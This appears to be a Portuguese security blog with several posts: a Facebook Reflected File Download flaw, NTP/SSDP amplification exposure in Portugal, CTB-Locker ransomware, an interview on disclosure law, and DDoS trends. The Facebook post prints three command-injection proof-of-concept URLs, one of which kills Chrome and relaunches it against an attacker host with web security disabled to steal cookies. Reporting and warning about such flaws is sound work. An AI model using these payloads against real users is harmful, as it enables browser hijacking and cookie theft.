Facebook vulnerável a uma falha grave

facebook

A maior rede social do planeta está vulnerável a uma falha RFDReflected File Download – que permite a um utilizador malicioso obter controlo do sistema operativo da vítima. Com este tipo de vulnerabilidade, divulgada por Oren Hafif em Outubro de 2014, um utilizador pode enviar um link malicioso para um dominio confiável [neste caso o Facebook.com] e forçar um download nesse dominio confiável. Depois de executado, o utilizador malicioso pode executar qualquer comando do sistema operativo com o nível de permissão atual do utilizador [mais uma razão para que não navegue na web como administrador].

Mohamed Ramadan testou esta falha no Facebook e conseguiu replicar um RFD.
Os testes de demonstração da falha do Mohamed conseguem abrir a calculadora do Windows[1], o Paint[2] e num último exemplo, fechar o browser Chrome e reiniciá-lo com o modo segurança inativo para roubar os cookies do utilizador[3].

[1] https://api.facebook.com/method/update.bat?q=AttackSecure%22;||calc||&format=json

[2] https://api.facebook.com/method/update.bat?q=AttackSecure%22;||mspaint||&format=json

[3] https://api.facebook.com/method/Update.cmd?q=UpdateChrome%22;||taskkill /F /IM ch*|md||start chrome http://attacker-secure.com/ –disable-web-security –disable-popup-blocking||&format=json

fb-rfd-2

O autor desta descoberta testou todos estes exemplos no Windows 7 com o Internet Explorer 9, embora refira que também é possível executar com o Firefox, Chrome e Opera.

Fica aqui referência também ao vídeo que demonstra esta falha:

Pessoalmente experimentei com o IE8 e o IE11 e não foi possível executar o ataque. No entanto, com o IE9 no Windows Vista e Windows 7 correu o ataque sem problema.

Segundo a site do Mohamed, a resposta do Facebook a esta vulnerabilidade foi a seguinte:

Thanks for your report. This is a technique that has been reported before. It’s not fully fixable at present, at least for the general case, but we’re looking into ways to rectify it globally going forward. For now it’s a known risk and not eligible for a bug bounty reward. We do have mechanisms in place to monitor and mitigate abuse.

Isto é um grande risco de segurança para os todos utilizadores desta rede social. Fica a dica de verificarem sempre os links que vos enviam. Será uma questão de tempo até que utilizadores maliciosos comecem a usar este tipo de vulnerabilidade para propagar malware.

17.000 dispositivos vulneráveis a ataques em Portugal

ntp_map_portugal_2

Com base nos últimos artigos que tenho escrito, tanto no WebSegura, como no Tek Sapo, decidi obter mais informação sobre algumas falhas em routers em Portugal. Foquei-me inteiramente nos protocolos NTP e SSDP, visto serem neste momento bastante utilizados como plataforma para amplificação de ataques DDoS.

Nesta investigação, e com dados recolhidos entre os dias 11 e 12 deste mês no projeto ShadowServer Foundation, concluí que existem cerca de 17.491 dispositivos alegadamente vulneráveis a ataques NTP e SSDP/UPnP em Portugal.

No topo dos ISPs com mais dispositivos vulneráveis, está a VODAFONE, logo seguido pela MEO e a TVCABO.

Elaborei dois gráficos para melhor ilustrar os ISPs afetados em Portugal.

TOP10 dos ISPs vulneráveis ao NTP em Portugal

grafico_ntp

Num total de 12010 ocorrências [o gráfico apenas ilustra o total do Top10] – https://ntpscan.shadowserver.org/

TOP10 dos ISPs vulneráveis ao SSDP em Portugal

ssdp_portugal_grafico

Num total de 5481 ocorrências [o gráfico apenas ilustra o total do Top10] – https://ssdpscan.shadowserver.org/

Só para ter ideia do tipo de amplificação dos ataques SSDP, se for feito um pedido de 64 bytes ao serviço, a resposta é de 3283 bytes. Ou seja, uma amplificação de cerca de 50x.
Geralmente os utilizadores maliciosos utilizam pedidos M-SEARCH numa determinada gama de IPs. Se o dispositivo SSDP/UPnP responder ao pedido com a descrição do dispositivo, então está vulnerável. Com base nestas respostas, os utilizadores elaboram uma lista de dispositivos vulneráveis para posteriormente criarem botnets ou booters.

O projeto Shadowserver Foundation tem como objectivo pesquisar e identificar dispositivos com os serviços NTP e SSDP abertos e disponíveis.
Posteriormente contatam os responsáveis para uma resolução.

Gostava também de salientar que o Brasil é atualmente o 8º país no mundo com mais dispositivos NTP abertos (118.030 ocorrências) e 7º em relação ao SSDP (395.251 ocorrências). De facto são números assustadores.

Embora os utilizadores possam, na maioria dos casos, recorrer ao painel de administração dos dispositivos e desligar os serviços que que não utiliza, o papel deveria ser implementado pelo ISPs. Uma pequena GRANDE atenção que os ISPs poderiam dar aos seus clientes, seria fornecer um manual de segurança ou uma newsletter mensal [ou imediata assim que aparecer uma falha crítica] com informação de segurança, qualquer um deles seria positivo para uma web mais segura.

Criminosos ganham cerca de 13.000 euros/mês com o CTB-Locker

ctb-locker

CTB-Locker [Curve-Tor-Bitcoin Locker] ou Critroni é um ransomware muito popular presente. Propaga-se via email spam com anexos em .zip, que contêm por sua vez um executável .scr/.cab [apenas afeta máquinas Windows].
O executável é um downloader malicioso conhecido como Dalexis [ou Elenoocka]. Caso o utilizador execute o ficheiro .scr, o Dalexis vai tentar descarregar uma cópia do CTB-Locker, armazenado em diversos websites comprometidos.

Após este processo, vai executar o CTB-Locker.
Depois da vítima estar comprometida, o CTB-Locker cifra todos os ficheiros do computador do utilizador e acrescenta 7 carateres aleatórios aos nomes dos ficheiros originais.
Posteriormente, o CTB-Locker apresenta à vítima uma mensagem de resgate e um contador decrescente para mostrar o tempo restante que a vítima tem para pagar o resgate. O malware muda inclusive o fundo-de-ecrã do sistema operativo com instruções para o pagamento.

O método de pagamento é feito exclusivamente em Bitcoins e têm valores entre os 2BTC a 4BTC (cerca de 384€ a 768€).

ctb-locker2

No Reddit, um utilizador malicioso decidiu abrir o jogo e correr uma AMA [Ask Me Anything] sobre o CTB Locker:

CTB é muito barato se adquirirmos como afiliado mas posso gastar perto de $2.000-$10.000 por mês num ek, traffic, crypter etc

Apenas tento atingir os países UK,CA,US,AU. Estou a fazer cerca de $15.000 por mês e um lucro de $8.000

Já atingi a marca de $300.000. Uma média de $1.000 por instalação

Todos estes Bitcoins recebidos pelos utilizadores maliciosos são posteriormente utilizados noutros esquemas fraudulentos ou mesmo em troca de moeda ou serviços em fóruns, como por exemplo no Hackforums.net. Aparentemente, é uma forma rápida lavar o dinheiro dos ransomware.

hackforums

Segundo o blogue F-Secure, não existe maneira de quebrar a cifra utilizada pelo CTB-Locker. A única maneira que a vítima tem de recuperar os seus ficheiros, é com backups ou recebendo a chave para recuperar os ficheiros bloqueados pelos utilizadores maliciosos. No entanto, não devem escolher esta segunda opção. Estarão alimentar o crime online e nada garante que irão ter de volta os vossos ficheiros após o pagamento. Não se esqueça que está a lidar com criminosos.

Em Portugal, o CTB-Locker continua bastante presente. Segundo a empresa antivírus ESET, é atualmente a segunda maior ameaça no nosso país.

ctb-locker3

Fonte: http://virusradar.com/statistics/10/pt

Segundo o Diário Económico, são diversas as empresas afetadas e a PJ já confirmou a existência de diversas queixas.
Na minha opinião, é algo que está ainda a crescer e os utilizadores deverão ser alertados.

Análise do CTB-Locker no VT
Análise do Payload [neste caso o Angler EK] no VT

Para proteger-se contra este tipo de ameaças, deve manter sempre o seu software atualizado [sistema operativo, antivirus, Adobe Flash, Acrobat Reader, Java, etc.] e nunca clicar em links ou anexos duvidosos.

Pode consultar mais dicas de como se proteger no blogue da ESET.

Programas responsáveis de divulgação de vulnerabilidades – A continuação…

hammer

Dando continuidade ao tema referido no artigo sobre a possibilidade de um programa de divulgação de vulnerabilidades em Portugal, questionei Sérgio Silva, do Conselho Superior da Magistratura, sobre a opinião e o seu ponto de vista legal destes programas.

Que funções desempenha atualmente no Conselho Superior da Magistratura?

Coordenador da Unidade de Informática do Conselho Superior da Magistratura.

Qual é a sua opinião em relação aos programas responsáveis de divulgação de vulnerabilidades em Portugal?

Tendo em conta o panorama actual da segurança informática em Portugal associado à fraca consciencialização para esta temática este tipo de programas serão muito complicados de implementar . As empresas/entidades não reagem bem a possíveis alertas sobre falhas nos seus sistemas e muitas vezes quem faz o aviso fica com uma serie de problemas.

Numa conversa anterior, referiu que, mesmo que a empresa com estes programas, contratualizar quem testa as vulnerabilidades, é difícil diferenciar o que entra no programa e um possível ataque real. Existem soluções para este tipo de problema?

É uma questão muito complicada dado que quem testa pode sempre tornar-se num atacante real. A solução passaria por uma credenciação de quem poderia aderir a esse programa, ou seja a criação de uma comunidade portuguesa devidamente identificada que estaria autorizada a fazer os testes de vulnerabilidades das empresas que tivessem integradas em programas responsáveis de divulgação de vulnerabilidades em Portugal.

A atual lei portuguesa não prejudica a comunidade infosec?

A legislação Portuguesa, Lei n.º 109/2009 de 15 de Setembro, em matéria de Cibercrime é das mais completas e avançadas a nível europeu, basicamente todos as técnicas usadas pela comunidade infosec podem ser tipificadas nos vários artigos da referida lei .
O simples facto de alterar uma url de forma a produzir um erro, como por exemplo uma falha de SQL , pode ser considerada como tentativa de acesso ilegítimo e punida com pena de prisão até 1 ano ou com pena de multa até 120 dias.
No entanto e como é referido no nº6 no artigo 6.º da Lei n.º 109/2009 o procedimento penal depende de queixa, ou seja quando alguém da comunidade infosec descobre uma vulnerabilidade e a reporta corre o risco de que a entidade a quem reporta o erro fazer queixa.
A lei Portuguesa não prejudica em nada a comunidade infosec, o que prejudica é mais uma vez a falta de consciencialização dos “donos dos sistemas”, o investimento em segurança informática é muito diminuto e muitas vezes nulo, Portugal ainda não despertou em termos de Ciber Segurança e isso sim prejudica a comunidade infosec.

Para terminar, qual a sua opinião em relação à segurança dos sites governamentais. São constantes os sites desfigurados a várias entidades do governo. Será que não estamos todos em risco?

Penso que não existe uma grande diferença entre sites desfigurados governamentais e empresariais, o que difere é que um defacement num site governamental tem sempre mais impacto nos media do que num site empresarial.
Do meu ponto de visa as razões que levam a que este tipo de ataque tenha sucesso prende-se com o facto de que pura e simplesmente as plataformas são postas online e depois não existem procedimentos de monitorização ou de actualizações dos sistemas, quase nunca estão previstas nos contratos.
Actualmente é possível ver sites com vulnerabilidades que foram descobertas à mais de 3 anos e que já deviam ter sido corrigidas.
Outra questão é que quando se usam plataformas de CMS e é aplicado um template nem sempre se verifica a origem desse template ou se existe algo que possa comprometer o site no código do template.
Respondendo se estamos todos em risco a resposta é sim .
No entanto não tem a ver com sites governamentais onde são feitos defacement, tem sim a ver com a falta de estratégia a nível nacional na área da segurança informática e de um ecossistema de desenvolvimento de sistemas de informação em que a segurança informática não é a base mas sim um acessório.
Basicamente estamos a construir castelos e só no fim é que nos lembramos que deveríamos ter um fosso para impedir o ataque dos inimigos quando na lógica da estratégia defensiva o fosso deveria ser a primeira coisa a ser construída.

Agradeço ao Sérgio a disponibilidade que teve em responder ao WebSegura.net e a esclarecer algumas dúvidas que existiam na comunidade infosec.

Aumento da largura de banda, aumenta força dos DDoS

Créditos da foto: http://threatpost.com/

Com o aumento da largura de banda por parte dos ISPs aos utilizadores, impacto dos ataques DDoS também aumentam. Esta situação, derivada em grande parte do desconhecimento por parte dos utilizadores de protegerem corretamente o seu router, leva a uma amplificação dos ataques DDoS.

No meu ponto de vista, é para mim óbvio que não devemos limitar o aumento [da largura de banda] mas sim obrigar os fornecedores a lançarem atualizações para os routers e a enviarem informação regular com informação para os clientes melhorarem a segurança do equipamento contratado. Alguma vez receberam alguma newsletter ou notificação por parte do vosso ISP em relação a segurança?

Trocar a password de acesso de administração de acesso ao router; trocar chave de acesso ao Wi-Fi e desligar serviços que não utilizam poderá prevenir imensas complicações de segurança.

NTP e SSDP continuam a ser as técnicas favoritas para os ataques DDoS e a contratação de Booters [inclusive por portugueses] para o efeito já é um serviço conhecido. A questão é que nos últimos anos, a largura de banda destes ataques aumentaram exponencialmente. De referir que há uma década atrás, o maior ataque DDoS registado tinha pico em 8Gbps. Em 2014, o maior pico registado foi de 400Gbps.

Recentemente, recebemos no WebSegura.net uma notificação do Pedro Fernandes, de dois artigos que demonstram algumas fragilidades no software dos routers da ZON[NOS].

http://djprmf.com/nos-os-vossos-router-necessitam-de-uma-5473
http://djprmf.com/nos-wi-fi-powered-by-fon-dns-spoofing-5805

Também em novembro de 2014, o especialista de segurança Marco Vaz da empresa portuguesa da Integrity, encontrou uma falha nos routers Belkin.
Pessoalmente é de dar valor aos portugueses que demonstram este tipo de fragilidades.
Em Portugal temos qualidade na área de segurança de informação e é preciso apoiar estas iniciativas.

Claro que existem outros fatores de risco, como por exemplo um malware instalado num computador que funciona como zombie à espera de ativação para uma botnet. Tem de existir um fator de informação para o utilizador entender que o seu computador poderá ser uma via para ataques informáticos. Se o utilizador entender este fator, é um passo para o caminho de uma solução e diminuição de ataques DDoS e outro tipos ataques informáticos.

Da nossa parte, iremos sempre que possível alertar problemas relacionados com este assunto, mantendo o nosso papel de ajudar a comunidade.